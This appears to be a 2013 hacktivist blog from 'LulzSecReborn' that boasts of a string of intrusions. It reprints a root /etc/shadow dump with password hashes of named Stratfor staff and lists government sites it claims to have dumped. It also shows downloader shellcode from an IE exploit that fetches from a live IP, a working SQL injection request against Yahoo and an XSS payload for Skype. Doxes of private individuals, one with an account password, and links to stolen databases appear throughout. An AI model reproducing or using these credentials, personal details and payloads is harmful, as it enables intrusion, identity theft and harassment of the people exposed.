Friday, November 29, 2013

www.stratfor.com ROOTED & 1800+ passwords of the clients leaked! #FreeHammond #FuckStratforFriday




# id; cat /etc/shadow;
uid=0(root) gid=0(root) groups=81(apache)
root:$6$mG.Zpm0m$Wb6EqI.JE7wOPxc5XF/CwV/M7uQ0I6fxr4K9vh8DeFThXRGw.
M0MbBGapP1vSk5mR/UydFBV52H14LGLreTGc0:15315:0:::::
halt:*:9797:0:::::
operator:!*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
games:*:9797:0:::::
guest:*:9797:0:::::
nobody:*:9797:0:::::
sshd:!:13620:0:99999:7:::
distcc:!:13983:0:99999:7:::
cron:!:13983:0:99999:7:::
mooney:!$6$hYlR.VwC$kIlOBoube7T/ejOYCA4Q6e6z3zPmjhixvR347eodC8OHgWHZUf.
KdRQOvVUxwHRJwhQVooyqpxUkXcUAl4iO40:15241:0:99999:7:::
mysql:!:13984:0:99999:7:::
apache:!:13984:0:99999:7:::
squid:!:13984:0:99999:7:::
memcached:!:13984:0:99999:7:::
rickb:!$6$1DMB4fEW$I5eeVp9Xt82r.DSKfjg0K06DBrl7RXzkVUgBLDQ4aMy/
LtLquTSqELccQgRLkqfT6NBl7dNpXzcil4mxhIy310:15241:0:99999:7:::
postfix:!:14027:0:99999:7:::
straussd:!$6$JGmga8Bc$Leo0vprWftTPb3kmlX/9VMq/uRsJQ2c6nBB/kTjZTQc6U0NjuV7BvHW.
go8bmJIXRfWY4QlLd70oKb1Ifi8ux0:15241:0:99999:7:::
named:!:14035:0:99999:7:::
shannon:!$6$q.7qtUaa$MOxq4pnIHivczTfUMn3F.ReLLzgMW/QX.oH7MGVg7noTm3EEdK7DV/
CtUYreI2yl0tei23XkBdersQSMw9E2j0:15241:0:99999:7:::
production:!$1$biF.4xd3$I2U9GtDrb7Jt0p9PCNwGu0:14167:0:99999:7:::
kevin.garry:$1$js32N4P0$xkQYj.ItvaKc9dCnPCj851:14263:0:99999:7:::
autobot:!$6$CpUx69ju$yiq1B.LSe9R3Jxn3CEiPid5ZnBov.
GSzgaiZU82iiVN1KEkipHtDQKsMZXjURPSRZpIKpAx1GRXbO7gL4bSV61:14691:0:99999:7:::
tcpdump:!:14700:0:99999:7:::
fginac:!$6$qOZpLzXY$r4h14ZXg108x1nExL/X..
LQi7AcOQQSGIEauDYsH6Lw9pYhY501z6ZQfnuT5K6TJt6A3/1P5iWqZ1A7myrcj51:15215:0:99999:
7:::
trent.geerdes:!$6$3aojynLH$x4w0HYQKzR/.5NIfwsnT5m1TchqLuNhHRpqdx.eEMNuc8ly0/
EZ9dUNx9sgQOVXBZFcX7vSevKw22N7NtUdv8.:15147:0:99999:7:::
matt.tyler:!$6$OU6ly6A1$
6iFvtcHmMZduf8zoyiX3dnKtIb0xlGJ0oSZuJ7VTZNk12T6QrW47yL7uojmUGt7EHB.
OdZ4COK4ZdlQt6FvW8/:15241:0:99999:7:::
mike.rivas:$6$p2w233qA$
x8xAWEpcxg9xXSYcm4R3irc084TMEqWsoNUCYdmvmv454FMbryYVem79DDvmVf5bsO3NRupg9KrS1Ap/
wvhgh0:15315:0:99999:7:::
steve.elkins:$6$Eg4hmfat$mjxnoc/
ISAoJ284Hf33MTS1pBrNX3jPcgX62WQsCZMJMzXN33BX3WK0Bd1OxsDEe2PrccehxkuGOtFhN/twuK/:
15315:0:99999:7:::
matt.vance:$6$3AW5BS6D$
V3jTbeef457tc0FBwkOJLfyCbg6ZfBzGWGYk0JzqZJuKTOYidtkgadJQ13BeyyoiwvHY.
oThAKmqbKAb3OKUp0:15315:0:99999:7:::
chase.hoffman:!$6$K9rkmont$T8EIXjMzM12w5vzsvI3yQu6/
LH45bRNXy5XbpWRcXvNdp42paPgKsDvOFGQs/xF2SsGhv1OaKu05Rjay7MLC01:15218:0:99999:7::
:
ngeron:$6$wSAPF5UJ$kkHTg/PO43Ft65Ha5FVuzAsBoopbEY9yJDqJp51lw/
HU81mHXf53q5s5V97TzD56mUGMIBlCDl.ijYyZB5tKa/:15314:0:99999:7:::


1800+ Passwords of the Stratfor Clients Leaked

Online available here: 



Enjoy.

Tuesday, November 5, 2013

Massive .GOV datadump! 50 Government sites dumped including data from cia.gov #AntiSec #5Nov



"Remember, remember
The fifth of November
The gunpowder treason and plot.
I know of no reason
Why the gunpowder treason
Should ever be forgot."

magya.cba.gov.ar
www.inah.gob.mx
www.szwzfy.gov.cn
programas.jalisco.gob.mx
www.dyjy.gov.cn
www.pgn.gob.gt
www.loc.gov
tabasco.setab.gob.mx
www.fcccwtcmorelos.gob.mx
www.commerce.gov.pk
www.acapulco.gob.mx
www.bhutan.gov.bt
ace.arc.nasa.gov
www.itu.sp.gov.br
ebeijing.gov.cn
www.nva.gov.lv
pastic.gov.pk
www.uscis.gov
www.seprelad.gov.py
www.nepalhmg.gov.np
osd.mil
www.finance.gov.tt
bayside.vic.gov.au
slv.vic.gov.au
www.moch.gov.il
camimex.org.mx
www.ambiente.gov.br
www.depdag.go.id
www.ird.gov.np
www.islamicaffairs.gov.mv
jerez.gob.mx
asf-morelos.gob.mx
ranchomirageca.gov
www.vermont.gov
qualitapa.gov.it
www.itimarconi.gov.it
www.itcgcesaro.gov.it
www.itcpantaleo.gov.it
deporte.gob.mx
www.congresochihuahua.gob.mx
www.ccnpg.gob.ve
www.gobarinas.gob.ve
wwww.dpe.gov.za
www.budpar.go.id
www.presidencia.gob.bo
eproc.presidentofnepal.gov.np
www.rpd.gov.lk
www.most.gov.lk
fpsc.gov.pk
www.cia.gov




Good November 5.

Friday, October 25, 2013

Decoded shellcode from the IE vml exploit seen in the php.net pcap


00000000  e8 00 00 00 00 5b 8d b3 bf 01 00 00 56 8d b3 ab  .....[......V...
00000010  01 00 00 56 6a 04 68 88 4e 0d 00 e8 af 00 00 00  ...Vj.h.N.......
00000020  8d 83 d3 01 00 00 50 ff 93 bf 01 00 00 8d b3 cf  ......P.........
00000030  01 00 00 56 8d b3 bb 01 00 00 56 6a 01 68 88 90  ...V......Vj.h..
00000040  03 00 e8 88 00 00 00 8d b3 de 01 00 00 89 f7 ac  ................
00000050  3c 7c 74 06 84 c0 74 02 eb f5 c6 46 ff 00 80 3f  <|t...t....F...?
00000060  00 74 08 57 e8 04 00 00 00 eb e2 c9 c3 55 89 e5  .t.W.........U..
00000070  81 ec 08 02 00 00 60 8d b5 f8 fd ff ff 56 68 60  ......`......Vh`
00000080  02 00 00 ff 93 c3 01 00 00 8d bd fc fe ff ff 57  ...............W
00000090  68 00 00 00 00 68 00 00 00 00 56 ff 93 c7 01 00  h....h....V.....
000000a0  00 68 00 00 00 00 68 00 00 00 00 57 ff 75 08 68  .h....h....W.u.h
000000b0  00 00 00 00 ff 93 cf 01 00 00 85 c0 75 0c 68 05  ............u.h.
000000c0  00 00 00 57 ff 93 cb 01 00 00 61 c9 c2 04 00 55  ...W......a....U
000000d0  89 e5 51 56 57 8b 4d 0c 8b 75 10 8b 7d 14 ff 36  ..QVW.M..u..}..6
000000e0  ff 75 08 e8 13 00 00 00 89 07 83 c7 04 83 c6 04  .u..............
000000f0  e2 ec 5f 5e 59 89 ec 5d c2 10 00 55 89 e5 53 56  .._^Y..]...U..SV
00000100  57 51 64 ff 35 30 00 00 00 58 8b 40 0c 8b 48 0c  WQd.50...X.@..H.
00000110  8b 11 8b 41 30 6a 02 8b 7d 08 57 50 e8 5b 00 00  ...A0j..}.WP.[..
00000120  00 85 c0 74 04 89 d1 eb e7 8b 41 18 50 8b 58 3c  ...t......A.P.X<
00000130  01 d8 8b 58 78 58 50 01 c3 8b 4b 1c 8b 53 20 8b  ...XxXP...K..S .
00000140  5b 24 01 c1 01 c2 01 c3 8b 32 58 50 01 c6 6a 01  [$.......2XP..j.
00000150  ff 75 0c 56 e8 23 00 00 00 85 c0 74 08 83 c2 04  .u.V.#.....t....
00000160  83 c3 02 eb e3 58 31 d2 66 8b 13 c1 e2 02 01 d1  .....X1.f.......
00000170  03 01 59 5f 5e 5b 89 ec 5d c2 08 00 55 89 e5 51  ..Y_^[..]...U..Q
00000180  53 52 31 c9 31 db 31 d2 8b 45 08 8a 10 80 ca 60  SR1.1.1..E.....`
00000190  01 d3 d1 e3 03 45 10 8a 08 84 c9 e0 ee 31 c0 8b  .....E.......1..
000001a0  4d 0c 39 cb 74 01 40 5a 5b 59 89 ec 5d c2 0c 00  M.9.t.@Z[Y..]...
000001b0  86 57 0d 00 92 21 0d 00 ce 15 d2 00 ea 6f 00 00  .W...!.......o..
000001c0  c6 30 8e 03 00 00 00 00 00 00 00 00 00 00 00 00  .0..............
000001d0  00 00 00 00 00 00 00 00 75 72 6c 6d 6f 6e 2e 64  ........urlmon.d
000001e0  6c 6c 00 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  ll.http://144.76
000001f0  2e 31 39 32 2e 31 30 32 2f 3f 39 64 65 32 36 66  .192.102/?9de26f
00000200  66 33 62 36 36 62 61 38 32 62 33 35 65 33 31 62  f3b66ba82b35e31b
00000210  66 34 65 61 39 37 35 64 66 65 7c 68 74 74 70 3a  f4ea975dfe|http:
00000220  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000230  2f 3f 39 30 66 35 62 39 61 31 66 62 63 62 32 65  /?90f5b9a1fbcb2e
00000240  34 61 38 37 39 30 30 31 61 32 38 64 37 39 34 30  4a879001a28d7940
00000250  62 34 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  b4|http://144.76
00000260  2e 31 39 32 2e 31 30 32 2f 3f 38 65 65 63 36 63  .192.102/?8eec6c
00000270  35 39 36 62 62 33 65 36 38 34 30 39 32 62 39 65  596bb3e684092b9e
00000280  61 38 39 37 30 64 37 65 61 65 7c 68 74 74 70 3a  a8970d7eae|http:
00000290  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
000002a0  2f 3f 33 35 35 32 33 62 62 38 31 65 63 61 36 30  /?35523bb81eca60
000002b0  34 66 39 65 62 64 31 37 34 38 38 37 39 66 33 66  4f9ebd1748879f3f
000002c0  63 31 7c 68 74 74 70 3a 2f 2f 31 34 34 2e 37 36  c1|http://144.76
000002d0  2e 31 39 32 2e 31 30 32 2f 3f 62 32 38 62 30 36  .192.102/?b28b06
000002e0  66 30 31 65 32 31 39 64 35 38 65 66 62 61 39 66  f01e219d58efba9f
000002f0  65 30 64 31 66 65 31 62 62 33 7c 68 74 74 70 3a  e0d1fe1bb3|http:
00000300  2f 2f 31 34 34 2e 37 36 2e 31 39 32 2e 31 30 32  //144.76.192.102
00000310  2f 3f 35 32 64 34 65 36 34 34 65 39 63 64 61 35  /?52d4e644e9cda5
00000320  31 38 38 32 34 32 39 33 65 37 61 34 63 64 62 37  18824293e7a4cdb7
00000330  61 31 00                                         a1.

Disassembly of the code portion:

00000000  E800000000        call dword 0x5
00000005  5B                pop ebx
00000006  8DB3BF010000      lea esi,[ebx+0x1bf]
0000000C  56                push esi
0000000D  8DB3AB010000      lea esi,[ebx+0x1ab]
00000013  56                push esi
00000014  6A04              push byte +0x4
00000016  68884E0D00        push dword 0xd4e88
0000001B  E8AF000000        call dword 0xcf
00000020  8D83D3010000      lea eax,[ebx+0x1d3]
00000026  50                push eax
00000027  FF93BF010000      call dword [ebx+0x1bf]
0000002D  8DB3CF010000      lea esi,[ebx+0x1cf]
00000033  56                push esi
00000034  8DB3BB010000      lea esi,[ebx+0x1bb]
0000003A  56                push esi
0000003B  6A01              push byte +0x1
0000003D  6888900300        push dword 0x39088
00000042  E888000000        call dword 0xcf
00000047  8DB3DE010000      lea esi,[ebx+0x1de]
0000004D  89F7              mov edi,esi
0000004F  AC                lodsb
00000050  3C7C              cmp al,0x7c
00000052  7406              jz 0x5a
00000054  84C0              test al,al
00000056  7402              jz 0x5a
00000058  EBF5              jmp short 0x4f
0000005A  C646FF00          mov byte [esi-0x1],0x0
0000005E  803F00            cmp byte [edi],0x0
00000061  7408              jz 0x6b
00000063  57                push edi
00000064  E804000000        call dword 0x6d
00000069  EBE2              jmp short 0x4d
0000006B  C9                leave
0000006C  C3                ret
0000006D  55                push ebp
0000006E  89E5              mov ebp,esp
00000070  81EC08020000      sub esp,0x208
00000076  60                pushad
00000077  8DB5F8FDFFFF      lea esi,[ebp-0x208]
0000007D  56                push esi
0000007E  6860020000        push dword 0x260
00000083  FF93C3010000      call dword [ebx+0x1c3]
00000089  8DBDFCFEFFFF      lea edi,[ebp-0x104]
0000008F  57                push edi
00000090  6800000000        push dword 0x0
00000095  6800000000        push dword 0x0
0000009A  56                push esi
0000009B  FF93C7010000      call dword [ebx+0x1c7]
000000A1  6800000000        push dword 0x0
000000A6  6800000000        push dword 0x0
000000AB  57                push edi
000000AC  FF7508            push dword [ebp+0x8]
000000AF  6800000000        push dword 0x0
000000B4  FF93CF010000      call dword [ebx+0x1cf]
000000BA  85C0              test eax,eax
000000BC  750C              jnz 0xca
000000BE  6805000000        push dword 0x5
000000C3  57                push edi
000000C4  FF93CB010000      call dword [ebx+0x1cb]
000000CA  61                popad
000000CB  C9                leave
000000CC  C20400            ret 0x4
000000CF  55                push ebp
000000D0  89E5              mov ebp,esp
000000D2  51                push ecx
000000D3  56                push esi
000000D4  57                push edi
000000D5  8B4D0C            mov ecx,[ebp+0xc]
000000D8  8B7510            mov esi,[ebp+0x10]
000000DB  8B7D14            mov edi,[ebp+0x14]
000000DE  FF36              push dword [esi]
000000E0  FF7508            push dword [ebp+0x8]
000000E3  E813000000        call dword 0xfb
000000E8  8907              mov [edi],eax
000000EA  83C704            add edi,byte +0x4
000000ED  83C604            add esi,byte +0x4
000000F0  E2EC              loop 0xde
000000F2  5F                pop edi
000000F3  5E                pop esi
000000F4  59                pop ecx
000000F5  89EC              mov esp,ebp
000000F7  5D                pop ebp
000000F8  C21000            ret 0x10
000000FB  55                push ebp
000000FC  89E5              mov ebp,esp
000000FE  53                push ebx
000000FF  56                push esi
00000100  57                push edi
00000101  51                push ecx
00000102  64FF3530000000    push dword [dword fs:0x30]
00000109  58                pop eax
0000010A  8B400C            mov eax,[eax+0xc]
0000010D  8B480C            mov ecx,[eax+0xc]
00000110  8B11              mov edx,[ecx]
00000112  8B4130            mov eax,[ecx+0x30]
00000115  6A02              push byte +0x2
00000117  8B7D08            mov edi,[ebp+0x8]
0000011A  57                push edi
0000011B  50                push eax
0000011C  E85B000000        call dword 0x17c
00000121  85C0              test eax,eax
00000123  7404              jz 0x129
00000125  89D1              mov ecx,edx
00000127  EBE7              jmp short 0x110
00000129  8B4118            mov eax,[ecx+0x18]
0000012C  50                push eax
0000012D  8B583C            mov ebx,[eax+0x3c]
00000130  01D8              add eax,ebx
00000132  8B5878            mov ebx,[eax+0x78]
00000135  58                pop eax
00000136  50                push eax
00000137  01C3              add ebx,eax
00000139  8B4B1C            mov ecx,[ebx+0x1c]
0000013C  8B5320            mov edx,[ebx+0x20]
0000013F  8B5B24            mov ebx,[ebx+0x24]
00000142  01C1              add ecx,eax
00000144  01C2              add edx,eax
00000146  01C3              add ebx,eax
00000148  8B32              mov esi,[edx]
0000014A  58                pop eax
0000014B  50                push eax
0000014C  01C6              add esi,eax
0000014E  6A01              push byte +0x1
00000150  FF750C            push dword [ebp+0xc]
00000153  56                push esi
00000154  E823000000        call dword 0x17c
00000159  85C0              test eax,eax
0000015B  7408              jz 0x165
0000015D  83C204            add edx,byte +0x4
00000160  83C302            add ebx,byte +0x2
00000163  EBE3              jmp short 0x148
00000165  58                pop eax
00000166  31D2              xor edx,edx
00000168  668B13            mov dx,[ebx]
0000016B  C1E202            shl edx,0x2
0000016E  01D1              add ecx,edx
00000170  0301              add eax,[ecx]
00000172  59                pop ecx
00000173  5F                pop edi
00000174  5E                pop esi
00000175  5B                pop ebx
00000176  89EC              mov esp,ebp
00000178  5D                pop ebp
00000179  C20800            ret 0x8

Friday, October 11, 2013

Justin Bieber D0X & www.justinbieberweb.com DUMP! #FuckBieberFriday



First Name: Justin
Last Name: Bieber
Age: 19
Date of Birth: March 1, 1994
Zodiac Sign: Pisces
Birthplace: London, Ontario, Canada
Religion: Christian
Country: United States of America

State:
-Georgia
-California
-New York

City:
-Atlanta
-Los Angeles
-New York City

Zip-Code:
-92663
-10019

Street Address:
-4184573 Kinettie RD
-915 East Balboa BLVD
-825 Eighth Avenue (28th Floor)
-162 5th Avenue (6th Floor)

Phone #: 212-277-9000, 212-333-8000, 404-721-1584, 515-865-3396(Mngr), 404-665-3410, 941-249-2634(?), 503-823-3333(?), 727-258-5956(?)

Fax: 212-333-7255, 212-277-9099

E-Mail: justindrewbieber@rocketmail.com

Website:
-www.justinbiebermusic.com
-www.caa.com
-www.islanddefjam.com

Education:
-Jeanne Sauve Catholic School
-Stratford Northwestern Public School
-Stratford Northwestern Secondary School
-Homeschooled (Online Tutoring)

Personal Wealth: Personal Wealth to be estimated at about $67 Million.

Church:
Brethren In Christ Church Canada
2700 Bristol Circle
Oakville, ON




DATADUMP

Online: http://www.inventati.org/anonhacknews/leak/justinbieberweb.txt
Download Mirror1: http://www.inventati.org/anonhacknews/leak/justinbieberweb.txt.zip
Download Mirror2: https://anonfiles.com/file/5c9203ff6a9d19d8695cffd2cbf3ba2d
Download Mirror3: https://justcrypt.it/en/receive#id=e182c000b96c44ba9467ca871e255b3e9cdffd37&l=0&fk=Qlynrai8FtevZbjZbEcrf0TnPPS1e6oH&ik=wbum4r4X5tM770yve4Q4UMhi6tOAS6Ox

Friday, September 13, 2013

Federal Trade Commission ROOTED&LEAKED! #AntiSec #FuckFTCFriday



"OnGuardOnline.gov, a partnership of fourteen federal agencies managed by the Federal Trade Commission (FTC)" ... "the bad guys constantly develop new ways to attack your computer, so your security software must be up-to-date to protect against the latest threats." ... etc etc you got rooted and rm'd. umad? don't like it when your site is wiped of the internet do you?


Friday, August 2, 2013

www.minambiente.it - ENVIRONMENT MINISTER OF ITALY: HACKED & LEAKED! #LulzSecReborn #OpGreenRights





  • PRESS ITA:

Problema dell'arsenico nell'acqua potabile (domestica) nel basso Lazio
Problema dei rigassificatori: Livorno,Gioia Tauro e via dicendo
Problema dello smaltimento dei rifiuti urbani, emblematico nel recente passato il caso di Napoli
Problema dell'inquinamento dei mari , Arcipelago Toscano ma anche laguna di Venezia a causa del rilascio in mare di residui di lavorazione del PVC e di mercurio
Problema dello smaltimento dei rifiuti industriali tossici ( si veda il caso dei citati bidoni del cargo della ditta Grimaldi), ma anche la pratica di smaltire rifiuti tossici gettandoli in terra.
Per questa ragione ampie aree del paese solitamente dedicate alla pastorizia o alla agricoltura sono state trasformate in discariche illegali con danni incalcolabili per l'ambiente.
Proliferazione degli ECO-MOSTRI cioè edifici abusivi che deturpano il paesaggio spesso abbandonato ed incompiuti.
Problema dello smaltimento delle scorie radioattive provenienti dalle centrali Nucleari italiane ora dismesse che tutt'ora continuano ad essere fonte di contaminazione
Problema della cementificazione con conseguenti problemi nella irregimentazione delle acque con conseguenti alluvioni, emblematico è il caso di Genova
Problemi legati all'inquinamento industriale i casi sono innumerevoli.
Basti pensare alla vicenda ILVA.
La lista ovviamente sarebbe molto più lunga.
Inoltre spesso aziende di stato sviluppando i loro progetti a nome dei cittadini italiani e sovvenzionate da questi distruggono l'ambiente e devastano le culture di popoli antichi e pacifici che vivono a migliaia di chilometri dall'Italia.
E' il caso dell'ENEL che costruisce dighe in sud America, magari consorziandosi con altre imprese del settore, distruggendo ecosistemi incontaminati e di valore inestimabile come ad esempio avviene in Patagonia. Notiamo che i cittadini e le cittadine italiani sovvenzionano obbligatoriamente le vostre attività pagando per i propri consumi elettrici e non hanno alcuna possibilità di influire sulle scelte delle citate aziende di stato.

Quindi ribadendo la natura pacifica della nostra protesta che è da considerarsi affine a FLASHMOB o al SIT-IN (vedi la nostra dichiarazione), intendiamo tuttavia dar voce a tutti coloro i quali, indignati dalla breve lista  su esposta, vogliono rivendicare il proprio diritto al dissenso.
Inoltre è evidente che se questi e mille altri problemi si sono accatastati nel corso degli anni è perchè effettivamente l'azione delle istituzioni in primis il Minsitero dell'Ambiente è stata insufficente o inesistente.

Replichiamo alle parole rivolteci dai membri del ministero sul loro sito che i disservizi arrecati e la presunta lesione dei diritti degli utenti, non possono portare alla condanna morale delle nostre azioni.
I disservizi (e la presunta lesione del diritto degli utenti ) sono anche propri di altre forme di manifestazione di dissenso come ad esempio lo sciopero, che quindi sarebbe anch'esso da condannare. Al contrario il diritto di sciopero è sancito dalla costituzione. Cancellare questo diritto sarebbe assolutamente antidemocratico. 


___________________________________________

DOWNLOAD PDF LEAKS:

Mirror1: https://anonfiles.com/file/e5d7f77f1be0275870545fb9ad92d64d
Mirror2: http://www.inventati.org/anonhacknews/leak/MinaAmbiente.rar

DOWNLOAD DUMPS 
(username, password, phone, etc of more than 4000 account):

Mirror1: https://anonfiles.com/file/b5b57dcdee19975ac6826c1840d73bcc
Mirror2: http://inventati.org/anonhacknews/leak/minambienteITdump.rar
  
___________________________________________


USER TABLES:
  
Mirror: https://privatepaste.com/ce8146a443

MAILING LIST:

Mirror: https://privatepaste.com/b7ed651ed0

Wednesday, May 22, 2013

SQLi Exposed on Twitter Support #LulzVulnerabilities



 SQLi Vulnerability Exposed on Twitter Support

We have located a POST SQL vulnerability on support.twitter.com in their api_general form box, the box uses a 'referrer' parameter which is vulnerable, and by that. 
We can inject twitter, and possibly extract confidental data from Twitter.


It seems as most 'large' websites are vulnerable to this kind of attack, including m.facebook.com which was exploited by this vulnerability by some argentinian hacker.
 


The vulnerability lies in:

http://support.twitter.com/forms/submitted?regarding=api_general 

You see, there might be dozens of vulnerabilities lying in support.twitter.com
We can inject hidden boxes in this kind of atmosphere.

Tuesday, April 30, 2013

Skype XSS flaw #LulzVulnerabilities



Skype XSS

Spell check+Replace with "><img src=x onerror=alert('x') />

Friday, April 26, 2013

Yahoo! Blind SQL Injection #LulzVulnerabilities


The time-based sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce...

Vulnerable Service Domain:        tw.ysm.emarketing.yahoo.com
Vulnerable Module:            soeasy
Vulnerable File:            index.php
Vulnerable Parameters:            ?p=2&scId=

POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

Payload:
1; union select SLEEP(5)--

Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)--


GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y; B=9tgpb118xilu04&b=3&s=mu; AO=o=1&s=1&dnt=1; tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--; __utma=266114698.145757337399.1361672202.1361672202.1361672202.1; __utmb=2663114698.
1.10.1361672202; __utmc=2636114698; __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive

HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip

Wednesday, April 24, 2013

Introducing Lulz Security Reborn!


IF YOU COME TO OUR WEBSITE WE'LL TURN YOUR COMPUTER INTO A BOMB!!!!11111!111!!!!!

Hello, good day, and how are you? Splendid! We're LulzSecReborn, a small team of lulzy individuals who feel the drabness of the cyber community is a burden on what matters: fun. Considering fun is now restricted to Friday, where we look forward to the weekend, weekend, we have now taken it upon ourselves to spread fun, fun, fun, throughout the entire calender year.

Sing along!

Lulz, exciting and new,
come aboard, we're expecting you.

Lulz, life's sweetest reward,
let it flow, it floats back to you.

The Lulz Boat soon will be making another run
The Lulz Boat promises something for everyone.

Set a course for adventure,
your mind on a new romance.

Lulz won't hurt anymore,
it's an open smile on a friendly shore.

Yes LULZ! Welcome aboard: it's LULZ!

Friday, April 12, 2013

Hey Kevin Mitnick! Problems? #d0x #ForTehLulz


Cingular/AT&T Account

Account Name: Kevin Mitnick
Address: 7113 W Gowan RD
City: Las Vegas
State: NV
Zip: 89129
Landline: 1-805-342-4555
Cell: 1-805-341-4555
Password: 30281719
Last Four: 5695
Acct Number: 570939147
Email: mitnick@gmail.com
AIM's: kevinmitnick66, mitnick007




Friday, March 29, 2013

JOOMLA DATABASE HACKED! #LulzSecReborn



JOOMLA HACKED!

DATABASE DOWNLOAD



- FULL SQL DATABASE -

Mirror1:  BayFiles
Mirror2:  AnonFiles 
Mirror3:  FileDropper
Mirror4: DropBox


TABLES DOWNLOAD

beta_acesef_bookmarks_backup: CLICK HERE TO DOWNLOAD
beta_acesef_extensions_backup: CLICK HERE TO DOWNLOAD
beta_acesef_ilinks_backup: CLICK HERE TO DOWNLOAD
beta_acesef_metadata_backup: CLICK HERE TO DOWNLOAD
beta_acesef_tags_backup: CLICK HERE TO DOWNLOAD
beta_acesef_tags_map_backup: CLICK HERE TO DOWNLOAD
beta_acesef_urls_backup: CLICK HERE TO DOWNLOAD
beta_acesef_urls_moved_backup: CLICK HERE TO DOWNLOAD
beta_assets: CLICK HERE TO DOWNLOAD
beta_banner_clients: CLICK HERE TO DOWNLOAD
beta_banners: CLICK HERE TO DOWNLOAD
beta_categories: CLICK HERE TO DOWNLOAD
beta_contact_details: CLICK HERE TO DOWNLOAD
beta_content: CLICK HERE TO DOWNLOAD
beta_content_frontpage: CLICK HERE TO DOWNLOAD
beta_core_log_searches: CLICK HERE TO DOWNLOAD
beta_example_items: CLICK HERE TO DOWNLOAD
beta_extensions: CLICK HERE TO DOWNLOAD
beta_finder_filters: CLICK HERE TO DOWNLOAD
beta_finder_links: CLICK HERE TO DOWNLOAD
beta_finder_links_terms0: CLICK HERE TO DOWNLOAD
beta_finder_links_terms1: CLICK HERE TO DOWNLOAD
beta_finder_links_terms2: CLICK HERE TO DOWNLOAD
beta_finder_links_terms3: CLICK HERE TO DOWNLOAD
beta_finder_links_terms4: CLICK HERE TO DOWNLOAD
beta_finder_links_terms5: CLICK HERE TO DOWNLOAD
beta_finder_links_terms6: CLICK HERE TO DOWNLOAD
beta_finder_links_terms7: CLICK HERE TO DOWNLOAD
beta_finder_links_terms8: CLICK HERE TO DOWNLOAD
beta_finder_links_terms9: CLICK HERE TO DOWNLOAD
beta_finder_links_termsa: CLICK HERE TO DOWNLOAD
beta_finder_links_termsb: CLICK HERE TO DOWNLOAD
beta_finder_links_termsc: CLICK HERE TO DOWNLOAD
beta_finder_links_termsd: CLICK HERE TO DOWNLOAD
beta_finder_links_termse: CLICK HERE TO DOWNLOAD
beta_finder_links_termsf: CLICK HERE TO DOWNLOAD
beta_finder_taxonomy: CLICK HERE TO DOWNLOAD
beta_finder_taxonomy_map: CLICK HERE TO DOWNLOAD
beta_finder_terms: CLICK HERE TO DOWNLOAD
beta_finder_terms_common: CLICK HERE TO DOWNLOAD
beta_finder_tokens: CLICK HERE TO DOWNLOAD
beta_finder_tokens_aggregate: CLICK HERE TO DOWNLOAD
beta_finder_types: CLICK HERE TO DOWNLOAD
beta_foxcontact_sessions: CLICK HERE TO DOWNLOAD
beta_foxcontact_settings: CLICK HERE TO DOWNLOAD
beta_k2_attachments: CLICK HERE TO DOWNLOAD
beta_k2_categories: CLICK HERE TO DOWNLOAD
beta_k2_comments: CLICK HERE TO DOWNLOAD
beta_k2_extra_fields: CLICK HERE TO DOWNLOAD
beta_k2_items: CLICK HERE TO DOWNLOAD
beta_k2_rating: CLICK HERE TO DOWNLOAD
beta_k2_tags: CLICK HERE TO DOWNLOAD
beta_k2_tags_xref: CLICK HERE TO DOWNLOAD
beta_k2_user_groups: CLICK HERE TO DOWNLOAD
beta_k2_users: CLICK HERE TO DOWNLOAD
beta_languages: CLICK HERE TO DOWNLOAD
beta_menu: CLICK HERE TO DOWNLOAD
beta_menu_types: CLICK HERE TO DOWNLOAD
beta_messages: CLICK HERE TO DOWNLOAD
beta_messages_cfg: CLICK HERE TO DOWNLOAD
beta_modules: CLICK HERE TO DOWNLOAD
beta_modules_menu: CLICK HERE TO DOWNLOAD
beta_newsfeeds: CLICK HERE TO DOWNLOAD
beta_overrider: CLICK HERE TO DOWNLOAD
beta_redirect_links: CLICK HERE TO DOWNLOAD
beta_schemas: CLICK HERE TO DOWNLOAD
beta_template_styles: CLICK HERE TO DOWNLOAD
beta_update_categories: CLICK HERE TO DOWNLOAD
beta_update_sites: CLICK HERE TO DOWNLOAD
beta_updates: CLICK HERE TO DOWNLOAD
beta_user_notes: CLICK HERE TO DOWNLOAD
beta_user_profiles: CLICK HERE TO DOWNLOAD
beta_user_usergroup_map: CLICK HERE TO DOWNLOAD
beta_usergroups: CLICK HERE TO DOWNLOAD
beta_users: CLICK HERE TO DOWNLOAD
